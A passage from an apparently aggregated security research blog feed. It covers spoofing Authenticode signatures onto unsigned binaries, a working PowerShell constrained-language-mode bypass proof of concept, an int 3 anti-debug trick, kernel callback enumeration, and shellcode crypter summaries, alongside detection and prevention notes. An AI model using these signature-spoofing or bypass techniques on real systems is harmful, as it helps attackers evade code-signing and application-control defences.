    Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


    That’s it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report that the signature is invalid because the calculated Authenticode of the file does not match that of the signed hash stored in the certificate.

    Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.

    Application of a Catalog Signature to a PE File


    Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out, you can actually apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal (in this case) is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file: Certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

    Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.


    Step #2: Open the catalog file in in a hex editor and annotate the file size - 0x000137C7


    Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply:
    1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
    2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
    3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
    4. bCertificate: This will consist of the raw bytes of the catalog file.
    When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.


    Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE, append them your unsigned PE, and update the security directory offset and size accordingly.


    Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!


    Anomaly Detection Ideas


    The techniques presented in this blog post have hopefully got some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me just pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
    • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
    • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
    • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
    • How might you go about validating the signature of a catalog-signed file on a different system?
    • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that was to occur, then most system files, for all intents and purposes will cease to be signed.
    • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
    • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
    • What if there is data appended beyond the digital signature? This has been abused in the past.
    • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value: i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample that had more than one hit on a single Authentihash in VirusTotal, I would find that to be very interesting.

    Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode

    29 August 2017 at 12:32

    Introduction


    Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. It’s most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attackers ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

    ls C:\* -Recurse -Include '*.ps1', '*.psm1' |

      Select-String -Pattern 'Add-Type' |

      Sort Path -Unique |

      % { Get-AuthenticodeSignature -FilePath $_.Path } |

      ? { $_.SignerCertificate.Subject -match 'Microsoft' }


    Exploitation


    Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

    $Global:Source = @'

    public class Test {

        public static string PrintString(string inputString) {

            return inputString;

        }

    }

    '@


    Add-Type -TypeDefinition $Global:Source


    Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

    Alright, let’s think the process through together:
    1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
    2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
    3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

    Weaponization


    Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:

    Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'

    public class Injected {

        public static string ToString(string inputString) {

            return inputString;

        }

    }

    '@


    Import-Module VulnModule


    [Injected]::ToString('Injected!!!')


    A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

    So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

    Prevention


    The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single quoted string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

    Mitigation


    While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

    A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

    Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Such bypass scripts exist. Just ask Matt Nelson.

    Reporting


    If you find a bypass, report it to [email protected] and earn yourself a CVE. The PowerShell team actively addresses injection flaws, but they are also taking making proactive steps to mitigate many of the primitives used to influence code execution in these classes of bug.

    Conclusion


    While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and it’s library of signed modules/scripts remain to be a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you’ll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

    Now, everything that I just explained is great but it turns out that any call to Add-Type remains vulnerable to injection due to a design issue that permits exploiting a race condition. I really hope that continuing to shed light on these issues, Microsoft will considering addressing this fundamental issue.

    Detecting debuggers by abusing a bad assumption within Windows

    By: Nemi
    1 September 2017 at 21:03
    This blog post will go over an assumption made over a decade ago by Microsoft when dealing with software breakpoints that can be used to reveal the presence of most (all publicly available?) usermode and kernelmode debuggers.

    The x86 architecture can potentially encode a particular assembly instruction in multiple ways. For example, adding two registers, eax and ebx, and storing the result in eax takes the following mnemonic form: add eax, ebx. This can be encoded as the byte sequence 0x03 0xC3 or 0x01 0xD8. Fundamentally, the machine code represents the same assembly operation.

    If you're just interested in the anti-debug trick (without any context on why it works the way it does), scroll to the bottom of this post. For the rest of you brave enough to read this article in its entirety... buckle up. 

    The "long form" of int 3

    An int 3 can be encoded as either a single-byte 0xCC or via the more unconventional way as the multi-byte sequence 0xCD 0x03:

    From the Intel Instruction Set Reference (Volume 2, Chapter 3, Section 3.2).

    So, what happens when Windows encounters a multi-byte int 3? We create a simple C++ program to find out:

    After you run this application, you should see output similar to this:


    A single-byte int 3 (0xCC) works as expected. The start of the stub is located at 0x000001BE94B90000. When the stub is executed, the exception handler fires and we see that both the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip are located at 0x000001BE94B90000. This is the start of the int 3 instruction. Excellent!

    The multi-byte int 3 (0xCD 0x03) is located at address 0x000001BE94B90002. When this stub executes, the exception handler proclaims that the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip are located at 0x000001BE94B90003. This is in the middle of the int 3 instruction. Why? What went wrong?

    The assumption

    NOTE: From this point on, all disassembly and pseudo-source is reconstructed from system files that are provided with Windows x64 10.0.15063 (Creator's Update). If you'd like to follow along, make sure you use the same version I'm using!

    Microsoft assumes that all int 3's result from the single-byte variant.

    This assumption occurs very early during interrupt processing. Namely, when any interrupt occurs, such as when an int 3 is executed by the processor, control is redirected by the CPU to a handler registered in the appropriate position of the IDT (Interrupt Descriptor Table). In Windows, the handler for software breakpoints can be found at the symbol nt!KiBreakpointTrap:

    The first thing nt!KiBreakpointTrap does is generate a trap frame (_KTRAP_FRAME) on the stack that it passes to subsequent routines. A definition of this structure can be found below:

    Parts of this structure are automatically filled by the CPU when the interrupt fires, in particular, the range from +0x160 (_KTRAP_FRAME.ErrorCode) to +0x188 (_KTRAP_FRAME.SegSs):

    From the Intel Instruction Set Reference (Volume 3, Chapter 6, Section 6.12).

    The _KTRAP_FRAME is essentially an extension of the elements saved on the stack by the CPU. It's purpose is to provide a place to store volatile registers which can be clobbered when calling into functions that are compiled in C.

    A very important thing to note is that the instruction pointer (EIP) saved by the CPU on the stack (_KTRAP_FRAME.Rip) will be set to the instruction immediately following the one that caused entry into the handler. In our scenario, this means that the _KTRAP_FRAME.Rip member will be the instruction following our int 3, which will be ret (0xC3) in the example code above.

    After the volatile registers have been saved off, nt!KiBreakpointTrap performs a quick check to see whether the interrupt fired from usermode (ring3) or kernelmode code (ring0). If execution is coming from ring3, a swapgs needs to occur as well as some other bookkeeping with debug registers.

    Eventually, control flow will reconvene and the volatile floating point registers will also be stored off into the _KTRAP_FRAME. Before entering into more exception handling logic, the instruction pointer will be extracted from _KTRAP_FRAME.Rip (saved by the CPU upon entering nt!KiBreakpointTrap), decremented by one, and passed as an argument to nt!KiExceptionDispatch. Additionally, the exception code, EXCEPTION_BREAKPOINT (0x80000003), will also be passed in. The prototype for nt!KiExceptionDispatch:

    It's important to note that nt!KiExceptionDispatch (like nt!KiBreakpointTrap) is written in hand-ASM. It assumes that ecx contains the exception code, edx is the number of exception parameters (up to 3), r8 contains the address of the exception, r9 is the first exception parameter (if one exists), r10 is the second exception parameter (if one exists), r11 is the third exception parameter (if one exists), and rbp points to a segment in the _KTRAP_FRAME structure (at offset +0x80).

    Upon entry of nt!KiExceptionDispatch, the first thing that occurs is the generation of a _KEXCEPTION_FRAME. Whereas the _KTRAP_FRAME was used to store volatile registers, the _KEXCEPTION_FRAME provides a place to save all nonvolatile registers:

    nt!KiExceptionDispatch also creates an _EXCEPTION_RECORD structure on the stack. If you've done any error handling in Windows (in either usermode or kernelmode), you'll be familiar with this data structure as it is contained as a child within the _EXCEPTION_POINTERS data structure. We use both of these structures in our example above.

    Furthermore, this explains the first part of our mystery, namely, why the _EXCEPTION_RECORD.ExceptionAddress is incorrect. Recall that the _EXCEPTION_RECORD.ExceptionAddress is populated by the 3rd (r8) argument to nt!KiExceptionDispatch. This was passed in from nt!KiBreakpointTrap. This argument is a copy of the  _KTRAP_FRAME.Rip member decremented by one.

    To figure out where the _CONTEXT.Rip member is populated, we need to go deeper down the rabbit hole.

    nt!KiExceptionDispatch will call into nt!KiDispatchException (yes, the ordering of the words are intentionally flipped) passing in the recently created _EXCEPTION_RECORD and _KEXCEPTION_FRAME:

    This function will build a _CONTEXT out of the _KTRAP_FRAME and _KEXCEPTION_FRAME by invoking the helper routine KeContextFromKFrame. After the _CONTEXT is created, a check is made against the _EXCEPTION_RECORD.ExceptionCode (received as an argument from nt!KiExceptionDispatch) for STATUS_BREAKPOINT (0x80000003). If it's true, the _CONTEXT.Rip member will be decremented:

    This solves the last part of the mystery and causes the value in _CONTEXT.Rip to be tainted.

    The anti-debug trick

    Knowing what we know about how Windows handles the different types of int 3s, is it possible to leverage this discrepancy in a useful way? The answer is yes. 

    Debuggers display the state of the program at the time of an exception. Since Windows will incorrectly assume that our int 3 exception was generated from the single-byte variant, it is possible to confuse the debugger into reading "extra" memory. We leverage this inconsistency to trip a "guard page" of sorts. 


    As we saw in our first example (at the start of the article), when a multi-byte int 3 occurs, the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip values will lie in the middle of our multi-byte instruction instead of at the start. This means that the debugger will incorrectly determine that the instruction which threw the software breakpoint begins with the opcode 0x03. Referring to the trusty Intel manual, we can see that this opcode represents a 2-byte add instruction:

    From the Intel Instruction Set Reference (Volume 2, Chapter 3, Section 3.2).

    What would happen if we positioned our multi-byte int 3 near the end of a page of memory?

    When the operating system notifies our attached debugger of the breakpoint exception, the instruction pointer will point to memory that will be misinterpreted as the start of an add (0x03) instruction. This will cause the debugger to disassemble data on the adjacent page (since this instruction is 2 bytes long), and effectively read one byte past our "valid" memory range.

    Our trick relies on the fact that Windows, as an optimization, will not commit virtual memory to physical RAM unless it absolutely needs it. That is to say that most memory, especially in usermode, is paged. When memory needs to be made available for use that is not currently in physical RAM, a page fault occurs. To learn more about memory management, check out the following articles on our site: Introduction to IA-32e hardware paging and Exploring Windows virtual memory management.

    So, we can detect the memory read on this adjacent page by inspecting the corresponding PTE (Page Table Entry) using the QueryWorkingSetEx API. If the page is resident in our process' working set (e.g. mapped into our process by the debugger), the Valid bit in the _PSAPI_WORKING_SET_EX_BLOCK will be set.

    PoC||GTFO

    A full example can be found below:

    As always, if you have any questions or comments, please feel free to send us a message below. Happy hacking 😎.

    Enumerating process, thread, and image load notification callback routines in Windows

    By: Nemi
    17 September 2017 at 23:46
    Most people are familiar with the fact that Windows contains a wide variety of kernel-mode callback routines that driver developers can opt into to receive various event notifications. This blog post will explain exactly how some of these function under the hood. In particular, we'll investigate how the process creation and termination callbacks (nt!PsSetCreateProcessNotifyRoutine, nt!PsSetCreateProcessNotifyRoutineEx, and nt!PsSetCreateProcessNotifyRoutineEx2), thread creation and termination callbacks (nt!PsSetCreateThreadNotifyRoutine and nt!PsSetCreateThreadNotifyRoutineEx), and image load notification callbacks (nt!PsSetLoadImageNotifyRoutine) work internally. Furthermore, we'll release a handy WinDbg script that will let you enumerate these different types of callbacks.

    If you'd like to follow along, I'll be using system files from Windows x64 10.0.15063 (Creator's Update). All pseudo-source and disassembly is reconstructed from that specific release.

    Don't have a kernel debugging environment set up? Don't fret. You can follow our tutorial on how to setup basic kernel debugging using WinDbg and VMware here.

    Without further ado, let's begin.

    What do these callbacks do?

    These callbacks can be used by driver developers to gain notifications when certain events happen. For example, the basic process creation callback,  nt!PsSetCreateProcessNotifyRoutine, registers a user-defined function pointer ("NotifyRoutine") that will be invoked by Windows each time a process is created or deleted. As part of the event notification, the supplied handler gets a wealth of information. In our example, this will include the parent process' (if one exists) PID, the actual process' PID, and a boolean value that will let us know if the process is being created or if it's terminating. 

    Security software leverages these callbacks to be able to carefully inspect code running on the machine. 

    Divin' deep

    The documented APIs

    Our investigation has to begin somewhere. What better place than at the start of a documented function? We turn to nt!PsSetCreateProcessNotifyRoutine. MSDN claims that this routine has been around since Windows 2000. Even our friends at ReactOS seem to have implemented this functionality a long time ago. We'll see exactly how (if at all) things have changed in the 17 years from Windows 2000 until now.

    This function just seems to call an implementer routine, nt!PspSetCreateProcessNotifyRoutine. In fact, this same routine is invoked for the other variations, nt!PsSetCreateProcessNotifyRoutineEx and nt!PsSetCreateProcessNotifyRoutineEx2:


    The only difference is in the second parameter being passed to nt!PspSetCreateProcessNotifyRoutine. These are effectively flags. In the base case (nt!PsSetCreateProcessNotifyRoutine), these flags can either be 1 or 0 depending on the state of the "Remove" parameter. If "Remove" is TRUE, Flags=1. If "Remove" is FALSE, Flags=0. In the extended case (nt!PsSetCreateProcessNotifyRoutineEx), the flags can take on the value 2 or 3:

    Finally, for nt!PsSetCreateProcessNotifyRoutineEx2, these flags will take on the value 6 or 7:

    Therefore, one can imply that the flags passed to nt!PspSetCreateProcessNotifyRoutine have this definition:


    The undocumented world

    nt!PspSetCreateProcessNotifyRoutine is slightly complicated. I've defined it below, but I strongly recommend opening it in another window and following the text to ease understanding.

    Luckily for us, a lot of the internal data structures related to callback routines haven't changed since Windows 2000. The trailblazers at ReactOS have been spot-on with their structure definitions so we'll use them, when possible, to avoid duplicating work.

    For each callback, there's a global array that can contain up to 64 entries. In our case, the start of this array for process creation callbacks is located at nt!PspCreateProcessNotifyRoutine. Each entry in this array is of type _EX_CALLBACK:

    To avoid synchronization problems, nt!ExReferenceCallBackBlock is used which will safely acquire a reference to the underlying callback object, _EX_CALLBACK_ROUTINE_BLOCK (documented below). We can effectively reproduce the same behavior in a non-thread safe way via:

    If we're deleting a callback object ("Remove" is TRUE), we need to make sure that we can find the appropriate _EX_CALLBACK_ROUTINE_BLOCK in the array. This is done by checking first if the target "NotifyRoutine" matches that of the current _EX_CALLBACK_ROUTINE with nt!ExGetCallBackBlockRoutine:

    Then, we check to see if it's the right type (created with the correct version of (nt!PsSetCreateProcessNotifyRoutine/Ex/Ex2), by using nt!ExGetCallBackBlockContext:

    At this point, we've found the entry in the array. We will erase it by setting the _EX_CALLBACK value to NULL via nt!ExCompareExchangeCallback, decrementing the appropriate global counter (nt!PspCreateProcessNotifyRoutineExCount or nt!PspCreateProcessNotifyRoutineCount), dereferencing the _EX_CALLBACK_ROUTINE_BLOCK with nt!ExDereferenceCallBackBlock, waiting for any other code using the _EX_CALLBACK (nt!ExWaitForCallBacks), and finally freeing memory (nt!ExFreePoolWithTag). As you can see, great care is taken by Microsoft to not free a callback object that is in use.

    If we can't find the entry to remove in the nt!PspCreateProcessNotifyRoutine array after exhausting all 64 possibilities, the STATUS_PROCEDURE_NOT_FOUND error message is returned.

    On the other hand, if we're adding a new entry into the callback array, things are a little easier. A sanity check is performed by nt!MmVerifyCallbackFunctionCheckFlags to ensure that the "NotifyRoutine" is present in a loaded module. This helps avoid unlinked drivers (or shellcode) from receiving callback events:

    After we pass the sanity check, an _EX_CALLBACK_ROUTINE_BLOCK is allocated via nt!ExAllocateCallBack. This routine confirms the size and layout of the _EX_CALLBACK_ROUTINE_BLOCK structure:

    To wrap up, the newly allocated _EX_CALLBACK_ROUTINE_BLOCK is added to a free (NULL) location in the nt!PspCreateProcessNotifyRoutine array using nt!ExCompareExchangeCallBack (ensuring that it doesn't overflow the 64 limit maximum). Finally, the appropriate global counter is incremented and a global flag is set in nt!PspNotifyEnableMask denoting that there are callbacks of the user-specified type registered on the system.

    The other callbacks

    Thankfully, thread and image creation callbacks are very similar to process callbacks. They utilize the same underlying data structures. The only difference is that thread creation/termination callbacks are stored in the nt!PspCreateThreadNotifyRoutine array and that image load notification callbacks are stored in nt!PspLoadImageNotifyRoutine.

    The script

    It's finally time to put what we know to good use. Using WinDbg, we can create a simple script to automagically enumerate process, thread, and image callback routines.

    Instead of leveraging WinDbg's built-in scripting engine, I've elected to use something a little less disgusting. There's a great 3rd party extension for WinDbg called PyKd that enables Python scripting in WinDbg. Installing it is very straightforward. You'll need a copy of the appropriate bitness (e.g. 64-bit for 64-bit install of WinDbg) of Python for this to work.

    The script should be easy to follow. I tried to document it as best I could. It should also be compatible, at a minimum, with all forms of Windows from XP and up (both 32-bit and 64-bit flavors).

    After running the script using the "!py" command, you should see output similar to this:


    Final thoughts

    Knowing how the callback system functions in Windows allows us to do very interesting things. As seen above, we're able to programmatically iterate through each callback array and discover all registered callbacks. This is very useful for forensic purposes.

    Furthermore, these underlying array lists aren't under the protection of PatchGuard. Since registering callbacks is more-or-less a requirement for anti-virus products in order to develop a useful driver that plays nicely with PatchGuard on x64 systems, malware could dynamically disable (or replace) these registered callbacks to thwart security protection solutions. The possibilities are endless.

    Special thanks to the folks at ReactOS for their meticulous documentation. In particular, most of the structures I used were identified by Alex Ionescu for ReactOS a long time ago. Additionally, kudos to the folks that make PyKd. It's a much better alternative to the native scripting interface for WinDbg, in my opinion!

    As always, if y'all have any questions or comments, please feel free to comment below. Suggestions are greatly appreciated too! 

    SLAE32 - Assignment 6 - Polymorphic Shellcodes

    6 October 2017 at 00:00
    As a sixth assignment of the 32-bit Securitytube Linux Assembly Expert, I had to create three different polymorphic version of shellcodes taken from ShellStorm. Here is my selection: Linux x86 execve(“/bin/sh”) - 28 bytes. Linux x86 iptables flush - 43 bytes. Linux x86 ASLR deactivation - 83 bytes. Polymorphism means that we can mutate shellcode, so while keeping the same functionality the signature is different.

    SLAE32 - Assignment 7 - Custom Crypter

    10 October 2017 at 00:00
    As as a seventh and last assignment of the 32-bit Securitytube Linux Assembly Expert, I have been tasked to create a custom shellcode crypter. The idea behind a crypter, is to encode the shellcode beforehand and decode it at runtime. This process will make the shellcode looks like random values, and thus aiming to bypass AV and IDS detection. When it comes to cryptography, it is a well-known wise approach to not try to reinvent the wheel and instead use what is available and well tested: this is done to prevent any new weakness or bug to be introduced in a a freshly written crypto-algorithm.
    ❌
    ❌